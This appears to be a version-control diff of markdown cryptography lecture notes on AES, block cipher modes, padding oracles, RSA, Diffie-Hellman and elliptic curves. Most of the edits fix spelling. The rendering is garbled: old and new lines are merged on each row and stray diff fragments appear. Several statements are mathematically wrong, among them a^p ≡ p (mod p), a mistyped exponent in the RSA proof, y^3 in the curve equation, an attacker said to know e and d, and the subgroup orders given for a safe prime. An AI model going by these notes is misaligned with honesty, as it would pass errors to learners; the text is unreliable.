- i.e. no $A_i$ for which $S(A_i) = A_i$ - i.e. no $A_i$ for which $S(A_i) = A_i$
- No inverse fixed points - No inverse fixed points
- i.e. no $A_i$ for which $S(A_i) \oplus A_i = FF$ - i.e. no $A_i$ for which $S(A_i) \oplus A_i = FF$
- Minimisation of the largest non-trivial correlation between linear combinations of input bits and linear combinations of output bits - Minimisation of the largest non-trivial correlation between linear combinations of input bits and linear combinations of output bits
- 0 is a non-trivial combination - 0 is a non-trivial combination
- Minimisation of the largest non-trivial value in the `EXOR` table - Minimisation of the largest non-trivial value in the `EXOR` table
- This stops differential cryptanalysis - This stops differential cryptanalysis
#### AES Diffusion #### AES Diffusion
@@ -86,48 +86,54 @@ When multiplying by $x$, there’s a shortcut we can implement. We can set the e
- The first round key used is just the key - The first round key used is just the key
- We then take $W[3]$ and put it through the $g$ function which just permutes it - We then take $W[3]$ and put it through the $g$ function which just permutes it
- $g$ takes the word, shifts it one to the right and then passes it through the s-boxes - $g$ takes the word, shifts it one to the right and then passes it through the s-boxes
- We then `xor` it with $RC[i]$ which is just a constant value to ensure *something* changes - We then `xor` it with $RC[i]$ which is just a constant value to ensure *something* changes
- Like for example if we had a bit stream of all 0s - Like for example if we had a bit stream of all 0s
### Implementation ### Implementation
1. All addition and subtractions are `xor` 1. All additions and subtractions are `xor`
2. Multiply by `01` has no effect 2. Multiplying by `01` has no effect
3. Multiplying by `02` (which is $x$) is simply a left shift followed by modular reduction 3. Multiplying by `02` (which is $x$) is simply a left shift followed by modular reduction
- Left shift multiplies by $x$ - Left shift multiplies by $x$
- If the original $x^7$ bit was set, then we must `xor` with `0x1B` - If the original $x^7$ bit was set, then we must `xor` with `0x1B`
- ```java - Example:
// xtime
if ((a & 0x80) > 0) {
a = (a << 1) ^ 0x1b;
} else {
a <<= 1;
}
```
4. Multiply by `03` ($x+1$) is simply `xtime(a) ^ a` ```java
// xtime
if ((a & 0x80) > 0) {
a = (a << 1) ^ 0x1b;
} else {
a <<= 1;
}
```
- Inverse multiplications are by `09`, `11`, `13`, `14`. these require either a more general function or lookup tables 4. Multiplying by `03` ($x+1$) is simply `xtime(a) ^ a`
- Inverse multiplications are by `09`, `11`, `13`, `14`. These require either a more general function or lookup tables
- Consider the sum: - Consider the sum:
- $$ - Product:
a = x^6 + x^4 + x^2 + 1 \\
b = x^7 + x^4 + x^2 + x \\
\therefore a\cdot b = a\cdot x^7 + a\cdot x^4 + a\cdot x^2 + a\cdot x
$$
- $$ $$
a\curvearrowright a\cdot x \curvearrowright a\cdot x^2 \curvearrowright a\cdot x^3 \curvearrowright a\cdot x^4 \curvearrowright a\cdot x^5 a = x^6 + x^4 + x^2 + 1 \\
$$ b = x^7 + x^4 + x^2 + x \\
\therefore a\cdot b = a\cdot x^7 + a\cdot x^4 + a\cdot x^2 + a\cdot x
$$
- Here in $a\cdot b$, $a$ is just being multiplied by various powers of $x$. This can be easily calculated by repeated multiplying $a$ by $x$. - Repeated multiplication:
$$
a\curvearrowright a\cdot x \curvearrowright a\cdot x^2 \curvearrowright a\cdot x^3 \curvearrowright a\cdot x^4 \curvearrowright a\cdot x^5
$$
- Here in $a\cdot b$, $a$ is just being multiplied by various powers of $x$. This can be easily calculated by repeatedly multiplying $a$ by $x$.
- AES is very **fast in software** and pretty **fast in hardware** - AES is very **fast in software** and pretty **fast in hardware**
@@ -135,11 +141,11 @@ When multiplying by $x$, there’s a shortcut we can implement. We can set the e
- Much of the algorithm can be converted into a series of lookup tables - Much of the algorithm can be converted into a series of lookup tables
- **Trade off** between **speed** and **space** - **Trade-off** between **speed** and **space**
- There are numerous cache-timing and other attacks possible - There are numerous cache-timing and other attacks possible
- Implementation must be constant time - Implementation must be constant time
- CPU instructions help mitigate this - CPU instructions help mitigate this
- In general AES is much harder to implement safely than `ChaCha20` - In general AES is much harder to implement safely than `ChaCha20`
@@ -5,23 +5,25 @@
- Most messages don’t come in convenient 128-bit block lengths - Most messages don’t come in convenient 128-bit block lengths
- We’ll need to run a block cipher repeatedly on consecutive blocks - We’ll need to run a block cipher repeatedly on consecutive blocks
- Why not use stream ciphers? - Why not use stream ciphers?
- Historically stream ciphgers have proven harder to implement - Historically, stream ciphers have proven harder to implement
##### Padding ##### Padding
- ECB and some other modes require message length to be a multiple of the block size - ECB and some other modes require message length to be a multiple of the block size
- Public Key Cryptography Standards `PKCS7` is a common padding scheme: - Public Key Cryptography Standards `PKCS7` is a common padding scheme:
1. Padding bytes are always added to the plaintext **before it is encrypted** 1. Padding bytes are always added to the plaintext **before it is encrypted**
2. Each padding byte has a *value equal to the total number of padding bytes* that are added 2. Each padding byte has a *value equal to the total number of padding bytes* that are added
3. The total number of padding bytes is **atleast one** 3. The total number of padding bytes is **at least one**
- ![1646749511.png](img/1646749511.png) - ![1646749511.png](img/1646749511.png)
- Note in this example there are 7 `7`s and 16 `16`s - Note in this example there are 7 `7`s and 16 `16`s
- Note the bottom left example there is 1 `1`. This could be interpreted as 1 bytes of padding or some plaintext. This is why every block must contain at least one padding byte - Note that in the bottom-left example there is 1 `1`. This could be interpreted as 1 byte of padding or some plaintext. This is why every block must contain at least one padding byte
### Electronic Code Book Mode (ECB) ### Electronic Code Book Mode (ECB)
- Just encrypt each block one after another - Just encrypt each block one after another
- This is quick as can be easily parallelised - This is quick as it can be easily parallelised
![1646749909.png](img/1646749909.png) ![1646749909.png](img/1646749909.png)
@@ -44,7 +46,7 @@
### Deterministic vs Probabilistic Encryption ### Deterministic vs Probabilistic Encryption
- An encryption scheme is **deterministic** if some plaintext is mapped to a fixed ciphertext if the key is unchanged - An encryption scheme is **deterministic** if some plaintext is mapped to a fixed ciphertext if the key is unchanged
- ECB is deterministic, but most modern modes of operation of **probabilistic** - ECB is deterministic, but most modern modes of operation are **probabilistic**
- Probabilistic encryption schemes add randomness to the encryption process to achieve a non-deterministic generation of the ciphertext - Probabilistic encryption schemes add randomness to the encryption process to achieve a non-deterministic generation of the ciphertext
![1646750428.png](img/1646750428.png) ![1646750428.png](img/1646750428.png)
@@ -55,9 +57,9 @@
- `XOR` the output of each cipher block with the next input - `XOR` the output of each cipher block with the next input
- $IV$ - **Initialisation Vector** - $IV$ - **Initialisation Vector**
- The initial random seed that randomises the whole stream - The initial random seed that randomises the whole stream
- If you encrypted the same plaintext later it will be different - If you encrypted the same plaintext later it will be different
- An attacker will be unable to tell if $y_1$ and $y_2$ are the same message but with different $IV$ or different messages with different $IV$ - An attacker will be unable to tell if $y_1$ and $y_2$ are the same message but with different $IV$ or different messages with different $IV$
![1646750496.png](img/1646750496.png) ![1646750496.png](img/1646750496.png)
@@ -79,29 +81,31 @@ x_i = d_k(y_i) \oplus y_{i-1}
$$ $$
- If we lost $y_1$ we would be unable to decrypt $y_2$ - If we lost $y_1$ we would be unable to decrypt $y_2$
- We would be able to decrypt $y_3$ though - We would be able to decrypt $y_3$ though
##### Weaknesses ##### Weaknesses
- CBC was the primary method of encryption for many years - CBC was the primary method of encryption for many years
- Now it is less common - Now it is less common
- ![1646750960.png](img/1646750960.png) - ![1646750960.png](img/1646750960.png)
- If you flip the first bit in $y_2$, the same bit is flipped for $x_3$ - If you flip the first bit in $y_2$, the same bit is flipped for $x_3$
- Changing $y_2$ means $x_2$ no longer decrypts properly - Changing $y_2$ means $x_2$ no longer decrypts properly
### Padding Oracles ### Padding Oracles
- Here, an **oracle** is a system we can query and it will tell us if, once decrypt, some text has **valid padding** - Here, an **oracle** is a system we can query and it will tell us if, once decrypted, some text has **valid padding**
- A system is unlikely to tell you directly, but it might give away some clue - A system is unlikely to tell you directly, but it might give away some clue
- Image an example `api` that receives a CBC encrypted authorisation token - Imagine an example `api` that receives a CBC-encrypted authorisation token
![1646751224.png](img/1646751224.png) ![1646751224.png](img/1646751224.png)
#### Padding Oracle Attacks #### Padding Oracle Attacks
- Lets look at a single decryption block in CBC - Let's look at a single decryption block in CBC
- The attack is essentially the same for multiple blocks, just one at a time - The attack is essentially the same for multiple blocks, just one at a time
- You attack the last block, which contains the padding - You attack the last block, which contains the padding
> The general strategy is to manipulate bits in the IV to find valid padding and recover $z_i$ > The general strategy is to manipulate bits in the IV to find valid padding and recover $z_i$
@@ -116,22 +120,22 @@ $$
### Counter Mode (CTR) ### Counter Mode (CTR)
- Encrypt a nonce + counter and use this to mask the plaintext with `XOR` - Encrypt a nonce + counter and use this to mask the plaintext with `XOR`
- This is very easily parallelised - This is very easily parallelised
- Each block is encrypted differently, avoiding the issues with ECB mode - Each block is encrypted differently, avoiding the issues with ECB mode
![1646751954.png](img/1646751954.png) ![1646751954.png](img/1646751954.png)
- We are now using our block cipher as a stream cipher - We are now using our block cipher as a stream cipher
- The keystream generation (AES) is run through blocks - The keystream generation (AES) is run through blocks
- Decrypting is super easy, just the reverse - Decrypting is super easy, just the reverse
### Galois Counter Mode ### Galois Counter Mode
- Extends counter mode to add authenticity - Extends counter mode to add authenticity
- The sender definitely sent that message and it hasn’t been modified - The sender definitely sent that message and it hasn’t been modified
- Very similar to ocunter mode, but **adds authentication tag** - Very similar to counter mode, but **adds an authentication tag**
- Uses multiplication in a Galois Finite field $GF(2^{128})$ modulo $x^{128} + x^7 + x^2 + x + 1$ - Uses multiplication in a Galois Finite field $GF(2^{128})$ modulo $x^{128} + x^7 + x^2 + x + 1$
- Extremely parallelsiable - Extremely parallelisable
- Robust to message modification - Robust to message modification
- Is now standard in `TLS1.3` - Is now standard in `TLS1.3`
@@ -11,15 +11,15 @@ $$
#### Euclidean Algorithm #### Euclidean Algorithm
- The euclidean algorithm calculates the greatest common divisor of two numbers $gcd(r_0, r_1)$ - The Euclidean algorithm calculates the greatest common divisor of two numbers $gcd(r_0, r_1)$
- This is the largest number that divides both $r_0$ and $r_1$ - This is the largest number that divides both $r_0$ and $r_1$
- If $gcd(x,y)=1$ then $x$ and $y$ are **coprime** (sometimes called relatively prime) - If $gcd(x,y)=1$ then $x$ and $y$ are **coprime** (sometimes called relatively prime)
- The Euclidean algorithm is based around the fact: - The Euclidean algorithm is based around the fact:
- $gcd(r_0, r_1) = gcd(r_1, r_0 - r_1)$ - $gcd(r_0, r_1) = gcd(r_1, r_0 - r_1)$
![1646755531.png](img/1646755531.png) ![1646755531.png](img/1646755531.png)
- Computing $(x-y)\cdot gcd(r_0, r_1)$ is easier as its a smaller number - Computing $(x-y)\cdot gcd(r_0, r_1)$ is easier as it's a smaller number
- Doing this repeatedly is slow, we can use $gcd(r_0,r_1) = gcd(r_1, r_0\space mod \space r_1)$ - Doing this repeatedly is slow, we can use $gcd(r_0,r_1) = gcd(r_1, r_0\space mod \space r_1)$
![1646755650.png](img/1646755650.png) ![1646755650.png](img/1646755650.png)
@@ -37,16 +37,16 @@ $r_0=q\cdot r_1 + r_2 \\57=4\cdot 12 + 9\\ r_1=q\cdot r_2 + r_3 \\ 12=1\cdot 9 +
![1646756075.png](img/1646756075.png) ![1646756075.png](img/1646756075.png)
#### Bezout’s Identity #### Bézout’s Identity
- Bezout’s identity tells us that the greatest common divisor of two numbers can be expressed as the sum of multiples of these numbers - Bézout’s identity tells us that the greatest common divisor of two numbers can be expressed as the sum of multiples of these numbers
- $gcd(r_0,r_1) = s\cdot r_0 + t\cdot r_1$ - $gcd(r_0,r_1) = s\cdot r_0 + t\cdot r_1$
- e.g. $gcd(99,20)=-1\cdot 99+5\cdot 20=1$ - e.g. $gcd(99,20)=-1\cdot 99+5\cdot 20=1$
- $gcd(141,50)=11\cdot 141+-31\cdot 50=1$ - $gcd(141,50)=11\cdot 141+-31\cdot 50=1$
##### Extended Euclidean Algorithm ##### Extended Euclidean Algorithm
- The extended euclidean algorithm calculates the $gcd(r_0,r_1)$ as normal, and in addition calculates $s$ and $t$. - The extended Euclidean algorithm calculates the $gcd(r_0,r_1)$ as normal, and in addition calculates $s$ and $t$.
| Euclidean Algorithm | Extended Euclidean Algorithm | | Euclidean Algorithm | Extended Euclidean Algorithm |
| ---------------------------------- | ------------------------------------------------------------ | | ---------------------------------- | ------------------------------------------------------------ |
@@ -81,4 +81,3 @@ $$
$$ $$
Where $t$ is our multiplicative inverse Where $t$ is our multiplicative inverse
+36 -39
View File
@@ -21,19 +21,17 @@
### Euler Totient Function ### Euler Totient Function
- Integers $a$ and $m$ are *relatively prime* if they do not share a divisor (except 1) - Integers $a$ and $m$ are *relatively prime* if they do not share a divisor (except 1)
- $gcd(a,m) = 1$ - $gcd(a,m) = 1$
- The **Euler totient** $\Phi$ is the number of integers in $\mathbb{Z}_m = \{0,1,...m-1\}$ for which $gcd(a,m)=1$ - The **Euler totient** $\Phi$ is the number of integers in $\mathbb{Z}_m = \{0,1,...m-1\}$ for which $gcd(a,m)=1$
- For example $\Phi(9)=6$ as: - For example $\Phi(9)=6$ as:
- $gcd(1,9)=1$ :white_check_mark: - $gcd(1,9)=1$ :white_check_mark:
- $gcd(2,9)=1$ :white_check_mark: - $gcd(2,9)=1$ :white_check_mark:
- $gcd(3,9)=3$ ❌ - $gcd(3,9)=3$ ❌
- $gcd(4,9)=1$ :white_check_mark: - $gcd(4,9)=1$ :white_check_mark:
- $gcd(5,9)=1$ :white_check_mark: - $gcd(5,9)=1$ :white_check_mark:
- $gcd(6,9)=3$ ❌ - $gcd(6,9)=3$ ❌
- $gcd(7,9)=1$ :white_check_mark: - $gcd(7,9)=1$ :white_check_mark:
- $gcd(8,9)=1$ :white_check_mark: - $gcd(8,9)=1$ :white_check_mark:
###
#### Integer Factorisation #### Integer Factorisation
@@ -64,19 +62,19 @@ $$
#### Fermat’s Little Theorem #### Fermat’s Little Theorem
- Fermat’s little theorem states that for some prime $p$, and any integer $a$: - Fermat’s little theorem states that for some prime $p$, and any integer $a$:
- $a^{p-1} \equiv 1 \space (mod \space p)$ - $a^{p-1} \equiv 1 \space (mod \space p)$
- Also note that $a^{p-1} = a\cdot a^{p-2} \equiv 1 \space (mod \space p)$ - Also note that $a^{p-1} = a\cdot a^{p-2} \equiv 1 \space (mod \space p)$
- Therefore $a^{p-2}$ is actually the inverse of $a\space (mod \space p)$ - Therefore $a^{p-2}$ is actually the inverse of $a\space (mod \space p)$
- It follows that $a^p \equiv p \space (mod \space p)$ - It follows that $a^p \equiv p \space (mod \space p)$
#### Euler’s Theorem #### Euler’s Theorem
- Generalisation of Fermat’s little theorem, not exclusive to primes - Generalisation of Fermat’s little theorem, not exclusive to primes
- $a^{\Phi(m)} \equiv 1 \space (mod \space m)$ - $a^{\Phi(m)} \equiv 1 \space (mod \space m)$
- If $gcd(a,m)=1$ - If $gcd(a,m)=1$
- This works for any integer ring $\mathbb{Z}_m$ - This works for any integer ring $\mathbb{Z}_m$
- We can see that FLT is a special case of this - We can see that FLT is a special case of this
- $\Phi(p) = (p-1) \therefore a^{\Phi(p)} = a^{p-1} \equiv 1 \space (mod \space p)$ - $\Phi(p) = (p-1) \therefore a^{\Phi(p)} = a^{p-1} \equiv 1 \space (mod \space p)$
## RSA Key Generation ## RSA Key Generation
@@ -86,7 +84,7 @@ $$
4. Choose a value $e\in \{2, ..., \Phi(n) -1\}$ where $gcd(\Phi(n),e)=1$ 4. Choose a value $e\in \{2, ..., \Phi(n) -1\}$ where $gcd(\Phi(n),e)=1$
5. Compute $d$ where $d\cdot e \equiv 1 \space (mod \space \Phi(n))$ 5. Compute $d$ where $d\cdot e \equiv 1 \space (mod \space \Phi(n))$
![1647285406.png](img/1647285406.png) ![1647285406.png](img/1647285406.png)
$d$ is very easy to calculate if you know $p$ and $q$ $d$ is very easy to calculate if you know $p$ and $q$
@@ -97,29 +95,29 @@ $d$ is very easy to calculate if you know $p$ and $q$
##### Encryption ##### Encryption
- Now we have a public key $(3, 187)$ and private key $107$ - Now we have a public key $(3, 187)$ and private key $107$
- Encryption and decryption is performed by: - Encryption and decryption are performed by:
- $x^e \equiv y \space (mod \space n)$ - $x^e \equiv y \space (mod \space n)$
- $y^d \equiv x \space (mod \space n)$ - $y^d \equiv x \space (mod \space n)$
![1647285650.png](img/1647285650.png) ![1647285650.png](img/1647285650.png)
#### Proof #### Proof
- We want to show that $(x^e)^d = x^{ed} \equiv x \space (mod \space n)$ - We want to show that $(x^e)^d = x^{ed} \equiv x \space (mod \space n)$
- Let’s assume $gcd(x,n)=1$ So Euler’s theorem applies - Let’s assume $gcd(x,n)=1$, so Euler’s theorem applies
- $e\cdot d=1\space (mod \space \Phi(n))$ - $e\cdot d=1\space (mod \space \Phi(n))$
- $\therefore e\cdot d = 1 + k\cdot \Phi(n)$ - $\therefore e\cdot d = 1 + k\cdot \Phi(n)$
- $x^{e\cdot d} = x^{1+k\cdot \Phi(n)} = x\cdot x^{k+\Phi(n)}$ - $x^{e\cdot d} = x^{1+k\cdot \Phi(n)} = x\cdot x^{k+\Phi(n)}$
- $x\cdot (x^{\Phi(n)})^k=x\cdot(1)^k=x$ - $x\cdot (x^{\Phi(n)})^k=x\cdot(1)^k=x$
### Why is RSA Secure ### Why is RSA Secure
- We’d like the message $x$ based on some ciphertext $y$, given the public key $e$: - We’d like the message $x$ based on some ciphertext $y$, given the public key $e$:
- $y \equiv ?^d \space (mod \space n)$ - $y \equiv ?^d \space (mod \space n)$
- $x \equiv y^? \space (mod \space n)$ - $x \equiv y^? \space (mod \space n)$
- It can be fairly easy to calculate $d$: - It can be fairly easy to calculate $d$:
- $e\cdot d \equiv q \space (mod \space \Phi(n))$ - $e\cdot d \equiv q \space (mod \space \Phi(n))$
- $\Phi(n) = (p-1)(q-1)$ - $\Phi(n) = (p-1)(q-1)$
- As an attacker we only have access to $e$ and $d$ - As an attacker we only have access to $e$ and $d$
### Exponentiation ### Exponentiation
@@ -129,7 +127,7 @@ x^4 = x^2 \cdot x^2 \\
x^8 = x^4 \cdot x^4 x^8 = x^4 \cdot x^4
$$ $$
When calculating a exponent raised to a power of two, we can use previously calculated values. When calculating an exponent raised to a power of two, we can use previously calculated values.
##### Binary Exponentiation ##### Binary Exponentiation
@@ -158,8 +156,7 @@ $$
##### Computational Complexity ##### Computational Complexity
- What is the computational complexity of exponentiation? - What is the computational complexity of exponentiation?
- For a 2048 key: - For a 2048 key:
- $X^{2^{2048}}$ - A ridiculously big number - $X^{2^{2048}}$ - A ridiculously big number
- Where as using square and multiply - Whereas using square and multiply
- $2048=T$ we need $\frac{3T}{2}$ calculations - $2048=T$ we need $\frac{3T}{2}$ calculations
+24 -24
View File
@@ -2,7 +2,7 @@
- Two parties can jointly agree a *shared secret* over an *insecure channel* - Two parties can jointly agree a *shared secret* over an *insecure channel*
- Mathematically, what we are doing is both calculating the same value, mod a prime $p$ - Mathematically, what we are doing is both calculating the same value, mod a prime $p$
- Remember $p$ is $\times 10^{600}$ - Remember $p$ is $\times 10^{600}$
- The parties separately compute the same key, rather than share it - The parties separately compute the same key, rather than share it
### $\mathbb{Z}_n^*$ ### $\mathbb{Z}_n^*$
@@ -12,7 +12,7 @@
> This set forms an *abelian* group under multiplication modulo $n$. The identity element is 1 > This set forms an *abelian* group under multiplication modulo $n$. The identity element is 1
- In the majority of cases, we use a prime number as the modulus: - In the majority of cases, we use a prime number as the modulus:
- $\mathbb{Z}_p^* = \{1,2,...,p-1\}$ - $\mathbb{Z}_p^* = \{1,2,...,p-1\}$
**Group Cardinality** - The number of elements in that group **Group Cardinality** - The number of elements in that group
@@ -21,11 +21,11 @@ $$
|\mathbb{Z}_m^*| = \Phi(n) \\ |\mathbb{Z}_m^*| = \Phi(n) \\
$$ $$
- The security of ciphers often depend on the cardinality of the group - The security of ciphers often depends on the cardinality of the group
#### Cyclic Groups #### Cyclic Groups
- Lets consider group $\mathbb{Z}_{11}^*$ - Let's consider group $\mathbb{Z}_{11}^*$
- Consider calculating powers of 3 in this group - Consider calculating powers of 3 in this group
$$ $$
@@ -71,28 +71,30 @@ $$
- A group that contains an element $g$ of maximum order is called a cyclic group - A group that contains an element $g$ of maximum order is called a cyclic group
- Any element of maximum order is called a primitive root, or a generator - Any element of maximum order is called a primitive root, or a generator
- $2$ is a generator of $\mathbb{Z}_{11}^* \quad ord(2)=10$ - $2$ is a generator of $\mathbb{Z}_{11}^* \quad ord(2)=10$
- 3 is not a generator $\mathbb{Z}_{11}^* \quad ord(3)=5$ - 3 is not a generator $\mathbb{Z}_{11}^* \quad ord(3)=5$
##### Cyclic Subgroups ##### Cyclic Subgroups
- For all primes, $(\mathbb{Z}_{11}^*, \cdot)$ is an *abelian finite cyclic group* - For all primes, $(\mathbb{Z}_{11}^*, \cdot)$ is an *abelian finite cyclic group*
- Let $g \in G$ where $G$ is a cyclic group: - Let $g \in G$ where $G$ is a cyclic group:
1. $g^{|G|}=1$ 1. $g^{|G|}=1$
2. $ord(g)$ divides $|G|$ 2. $ord(g)$ divides $|G|$
- These are called **cyclic subgroups** - These are called **cyclic subgroups**
- Orders of $\mathbb{Z}_{11}^*$ - Orders of $\mathbb{Z}_{11}^*$
- ![1647359471.png](img/1647359471.png)
- Note the neutral element generates an order of $1$ - ![1647359471.png](img/1647359471.png)
- Note the neutral element generates an order of $1$
## Diffie-Hellman ## Diffie-Hellman
1. Alice and Bob agree on a large prime $p$, and a generator $g$ that is a primitive root of $p$ 1. Alice and Bob agree on a large prime $p$, and a generator $g$ that is a primitive root of $p$
2. Alice and Bob choose private numbers $a$ and $b$ at random in $\mathbb{Z}_p^*$ 2. Alice and Bob choose private numbers $a$ and $b$ at random in $\mathbb{Z}_p^*$
- Where $a\in \{1,2,...,p-1\}$ - Where $a\in \{1,2,...,p-1\}$
- and $b\in \{1,2,...,p-1\}$ - and $b\in \{1,2,...,p-1\}$
3. Alice calculates $A=g^a\space mod \space p$ and sends $A$ publicly to Bob 3. Alice calculates $A=g^a\space mod \space p$ and sends $A$ publicly to Bob
4. Bob calculates $B=g^b\space mod \space p$ and sends $B$ pubicly to Alice 4. Bob calculates $B=g^b\space mod \space p$ and sends $B$ publicly to Alice
5. Alice computes $k_{ab}=B^a\space mod \space p$ 5. Alice computes $k_{ab}=B^a\space mod \space p$
6. Bob computes $k_{ab}=A^b\space mod \space p$ 6. Bob computes $k_{ab}=A^b\space mod \space p$
@@ -105,13 +107,13 @@ $$
- Why is Diffie-Hellman so hard to break - Why is Diffie-Hellman so hard to break
- Consider $\mathbb{Z}^*_{10000079},\space g=3$ - Consider $\mathbb{Z}^*_{10000079},\space g=3$
- Alice calculates $A=3^a\space mod \space 10000079 = 4675535$ - Alice calculates $A=3^a\space mod \space 10000079 = 4675535$
- What is $a$? - What is $a$?
- This is the discrete logarithm problem - This is the discrete logarithm problem
**Brute Force** requires $O(|G|)$ **Brute Force** requires $O(|G|)$
**Shank’s Baby-Step Giant-Step** requires $O(\sqrt{|G|})$ and $\sim \sqrt{|G|}$ space **Shanks’ Baby-Step Giant-Step** requires $O(\sqrt{|G|})$ and $\sim \sqrt{|G|}$ space
- Using 128 bits, this is $2^{64}$, which would need a cluster - Using 128 bits, this is $2^{64}$, which would need a cluster
@@ -121,15 +123,13 @@ $$
- The discrete log problem is solved mod each prime factor and the results combined using the Chinese remainder theorem - The discrete log problem is solved mod each prime factor and the results combined using the Chinese remainder theorem
**Index calculus** directly attacks $\mathbb{Z}_p^*$ and is the reason Elliptic Curves is so much more efficient **Index calculus** directly attacks $\mathbb{Z}_p^*$ and is the reason elliptic curves are so much more efficient
##### Choosing Primes ##### Choosing Primes
- To avoid any unexpected small subgroup attacks, commonly used DH primes are **safe primes** - To avoid any unexpected small subgroup attacks, commonly used DH primes are **safe primes**
- A safe prime is a prime $p$ where $\frac{(p-1)}{2}$ is also a prime - A safe prime is a prime $p$ where $\frac{(p-1)}{2}$ is also a prime
- Consider the order of $\mathbb{Z}_p^*$ for a safe prime - Consider the order of $\mathbb{Z}_p^*$ for a safe prime
- This will have two subgroups of order $p-1$ and $2$ - This will have two subgroups of order $p-1$ and $2$
- By choosing a generator of the **subgroup of large prime order**, we avoid attacks on small factors of the group order - By choosing a generator of the **subgroup of large prime order**, we avoid attacks on small factors of the group order
- Basically this ensures the prime factorisation has one massive prime in it - Basically this ensures the prime factorisation has one massive prime in it
@@ -6,15 +6,15 @@ $$
ax^2+by^2=r^2 ax^2+by^2=r^2
$$ $$
- There are an infinite amount of solutions to this equation - There are an infinite number of solutions to this equation
- However if we restrict to only integers ($\mathbb{Z}$) and use mod, we have a finite set - However if we restrict to only integers ($\mathbb{Z}$) and use mod, we have a finite set
- We define an elliptic curve over points in $\mathbb{Z}_p, \space p>3$ - We define an elliptic curve over points in $\mathbb{Z}_p, \space p>3$
- Set of all pairs where: - Set of all pairs where:
- $y^2 \equiv x^3 + ax + b \space (mod \space p)$ - $y^2 \equiv x^3 + ax + b \space (mod \space p)$
- The neutral element is 0 - The neutral element is 0
- One requirement is: - One requirement is:
- $4a^3 + 27b^2 \neq 0 \space (mod \space p)$ - $4a^3 + 27b^2 \neq 0 \space (mod \space p)$
This is $y^2 \equiv x^3 -3x +3$ over $\mathbb{R}$ This is $y^2 \equiv x^3 -3x +3$ over $\mathbb{R}$
@@ -23,8 +23,8 @@ This is $y^2 \equiv x^3 -3x +3$ over $\mathbb{R}$
Notice the symmetry about the x axis, this is because we have a $y^2$ term meaning we have two solutions Notice the symmetry about the x axis, this is because we have a $y^2$ term meaning we have two solutions
- For a DLP problem, we need a cyclic group - For a DLP problem, we need a cyclic group
- Elements within the group - Elements within the group
- A group operation - A group operation
- For ECs the elements are points on the curve - For ECs the elements are points on the curve
- The operation is point addition - The operation is point addition
@@ -47,23 +47,23 @@ In elliptic curves, to get $4P$, we can either do $P+3P$ or $2P+2P$
##### Group Properties ##### Group Properties
- Closed - Closed
- Any closed addition operation will end up somewhere on the curve - Any closed addition operation will end up somewhere on the curve
- Associative - Associative
- The order of calculations doesn’t matter - The order of calculations doesn’t matter
##### Point Addition Equations ##### Point Addition Equations
- We can derive equations for this based on the equation for a line that intersects the curve in three places - We can derive equations for this based on the equation for a line that intersects the curve in three places
- Given $y^3=x^3+ax+b$ and points: - Given $y^3=x^3+ax+b$ and points:
- $P=(x_1,y_1)$ - $P=(x_1,y_1)$
- $Q=(x_2, y_2)$ - $Q=(x_2, y_2)$
- line $y=s\cdot x + m$ - line $y=s\cdot x + m$
- $(sx+m)^2 = x^3 + ax + b$ - $(sx+m)^2 = x^3 + ax + b$
- $s^2x^2 + 2sxm + m^2 = x^3+ax+b$ - $s^2x^2 + 2sxm + m^2 = x^3+ax+b$
- Plugging in $x_1, y_1, x_2, y_2$ - Plugging in $x_1, y_1, x_2, y_2$
- $P+Q=(x_3, y_3)$ - $P+Q=(x_3, y_3)$
- $x_3 = s^2 - x_1 - x_2$ - $x_3 = s^2 - x_1 - x_2$
- $y_3 = s(x_1 - x_3) - y_1$ - $y_3 = s(x_1 - x_3) - y_1$
$$ $$
s = \cases{\frac{y_2-y_1}{x_2-x_1} \quad (mod\space p); P\neq Q\\{\frac{3x_1^2+a}{2y_1}}\quad (mod\space p); P=Q} s = \cases{\frac{y_2-y_1}{x_2-x_1} \quad (mod\space p); P\neq Q\\{\frac{3x_1^2+a}{2y_1}}\quad (mod\space p); P=Q}
@@ -107,20 +107,20 @@ These are a pain as they don’t intersect the curve, we say they cross the curv
#### The Point $\mathcal O$ at Infinity #### The Point $\mathcal O$ at Infinity
- The point at infinity is the neutral element on a elliptic curve - The point at infinity is the neutral element on an elliptic curve
- $P+(-P)=\mathcal O$ - $P+(-P)=\mathcal O$
- $P+\mathcal O=P$ - $P+\mathcal O=P$
- In practice the point doesn’t have coordinates, and can’t be used within the normal formula - In practice the point doesn’t have coordinates, and can’t be used within the normal formula
- $P=(x,y)$ - $P=(x,y)$
- $-P=(x,-y)$ - $-P=(x,-y)$
- When implementing, you have to detect when the x values are equal and y values are inverses $\mod p$ - When implementing, you have to detect when the x values are equal and y values are inverses $\mod p$
- e.g. $(7,6)+(7,11)$ - e.g. $(7,6)+(7,11)$
- $\frac{y_2-y_1}{x_2-x_1}=\frac{-5}{0} = \mathcal O$ - $\frac{y_2-y_1}{x_2-x_1}=\frac{-5}{0} = \mathcal O$
### Cyclic Groups ### Cyclic Groups
- The points on an elliptic curve including the neutral element $\mathcal O$ form a cyclic subgroup - The points on an elliptic curve including the neutral element $\mathcal O$ form a cyclic subgroup
- Under certain conditions all points for a cyclic group - Under certain conditions all points form a cyclic group
![1647962887.png](img/1647962887.png) ![1647962887.png](img/1647962887.png)
@@ -136,48 +136,50 @@ $$
This is the graph modulus $p$ This is the graph modulus $p$
- Given a generator point, points on elliptic curves generate cyclic groups - Given a generator point, points on elliptic curves generate cyclic groups
- $y^2 \equiv x^3+2x+2 \mod 17$ - $y^2 \equiv x^3+2x+2 \mod 17$
- ![1648484059.png](img/1648484059.png)
- Here the next two points is the point at infinity ($\mathcal O$) and then it loops back round to $(5,1)$ - ![1648484059.png](img/1648484059.png)
- Here the next two points are the point at infinity ($\mathcal O$) and then it loops back round to $(5,1)$
- Each cyclic group includes the point at infinity - Each cyclic group includes the point at infinity
## Elliptic Curve Discrete Logarithm ## Elliptic Curve Discrete Logarithm
- We can construct a DLP in a very similar way to the modular exponentiation equivalent - We can construct a DLP in a very similar way to the modular exponentiation equivalent
- $aP = \underbrace{P+P+...+P}_{a \space\textrm{ times}} = A$ - $aP = \underbrace{P+P+...+P}_{a \space\textrm{ times}} = A$
- Given points $P$ and $A$, find scalar value $a$ - Given points $P$ and $A$, find scalar value $a$
- Its important to remember the distinction between points on the curve, and integer values - It's important to remember the distinction between points on the curve and integer values
- On elliptic curves, private keys such as $a$ are integers - On elliptic curves, private keys such as $a$ are integers
- Generators and public keys are points - Generators and public keys are points
#### Group Cardinality #### Group Cardinality
- The size of cyclic groups is very important to the security - The size of cyclic groups is very important to the security
